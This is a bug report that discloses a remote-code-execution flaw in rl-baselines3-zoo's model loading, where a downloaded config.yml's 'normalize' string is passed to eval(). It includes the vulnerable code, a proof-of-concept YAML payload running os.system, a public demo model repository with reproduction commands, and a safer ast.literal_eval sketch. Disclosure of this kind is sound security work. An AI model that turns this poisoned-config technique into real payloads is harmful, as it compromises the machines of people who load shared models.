🐛 Bug
Description
The rl-baselines3-zoo model loading pipeline parses remote `config.yml` files and later evaluates the `normalize` field with `eval()`. These values are loaded and executed in `get_saved_hyperparams()` when users download and run third-party model repositories.
The relevant code in `rl_zoo3/utils.py` (lines 425 to 438 at commit d29756c):

```python
config_file = os.path.join(stats_path, "config.yml")

if os.path.isfile(config_file):
    # Load saved hyperparameters
    with open(os.path.join(stats_path, "config.yml")) as f:
        hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader)
    hyperparams["normalize"] = hyperparams.get("normalize", False)
else:
    obs_rms_path = os.path.join(stats_path, "obs_rms.pkl")
    hyperparams["normalize"] = os.path.isfile(obs_rms_path)

# Load normalization params
if hyperparams["normalize"]:
    if isinstance(hyperparams["normalize"], str):
        normalize_kwargs = eval(hyperparams["normalize"])
```
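For context (a sketch, not the project's code or an official fix): `eval()` executes arbitrary expressions, while the standard library's `ast.literal_eval()` accepts only Python literals, so a payload like the one described in this report is rejected rather than run. Note that legitimate `normalize` values written as `dict(...)` calls would also be rejected by `literal_eval` and would need to use literal dict syntax instead:

```python
import ast

# Attacker-controlled string, as it might appear in a malicious config.yml.
payload = "os.system('echo pwned')"
# A benign value written as a Python literal.
legit = "{'norm_obs': True, 'norm_reward': False}"

# literal_eval refuses anything that is not a plain literal, so the
# function call in the payload raises instead of executing.
try:
    ast.literal_eval(payload)
    rejected = False
except (ValueError, SyntaxError):
    rejected = True

print(rejected)                 # True
print(ast.literal_eval(legit))  # {'norm_obs': True, 'norm_reward': False}
```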
An attacker can publish a benign-looking model repository whose config.yml contains a malicious normalize field. When a victim downloads and loads the model using rl_zoo3 commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.
For example:

```yaml
- - batch_size
  - 256
- - normalize
  - os.system('echo "You have been hacked!!!" && touch /tmp/hacked.txt')
```
This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.
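The config entries above illustrate the attack flow: after YAML parsing, the payload is still an inert string, and it only becomes code at the later `eval()` call. A minimal stdlib-only sketch of that flow, with hypothetical values (the dangerous `eval()` is deliberately not called here):

```python
# Hypothetical parsed form of a malicious config.yml: rl-baselines3-zoo
# stores hyperparameters as a list of [key, value] pairs.
pairs = [
    ["batch_size", 256],
    ["normalize", "os.system('touch /tmp/hacked.txt')"],
]

hyperparams = dict(pairs)

# After parsing, the payload is ordinary string data...
assert isinstance(hyperparams["normalize"], str)

# ...until the vulnerable branch hands it to eval().  Calling
# eval(hyperparams["normalize"]) at this point would run the shell command.
is_rce_point = isinstance(hyperparams["normalize"], str)

print(hyperparams["batch_size"])  # 256
print(is_rce_point)               # True
```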
To Reproduce
I uploaded a proof-of-concept model repository on Huggingface for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4
```shell
python -m rl_zoo3.load_from_hub --algo ppo --env BreakoutNoFrameskip-v4 -orga XManFromXlab -f logs/
python -m rl_zoo3.enjoy --algo ppo --env BreakoutNoFrameskip-v4 -f logs/
```
In this example, running the above commands will execute the attacker-controlled payload:
```shell
echo "You have been hacked!!!" && touch /tmp/hacked.txt
```
After execution, the file /tmp/hacked.txt is created, demonstrating successful arbitrary code execution.
Relevant log output / Error message
```
Loading latest experiment, id=1
Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip
You have been hacked!!!
```
System Info
- OS: Linux-6.8.0-88-generic-x86_64-with-glibc2.39 #89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025
- Python: 3.12.3
- Stable-Baselines3: 2.8.0a2
- PyTorch: 2.10.0+cu128
- GPU Enabled: True
- Numpy: 2.4.2
- Cloudpickle: 3.1.2
- Gymnasium: 1.2.3
- OpenAI Gym: 0.26.2
Checklist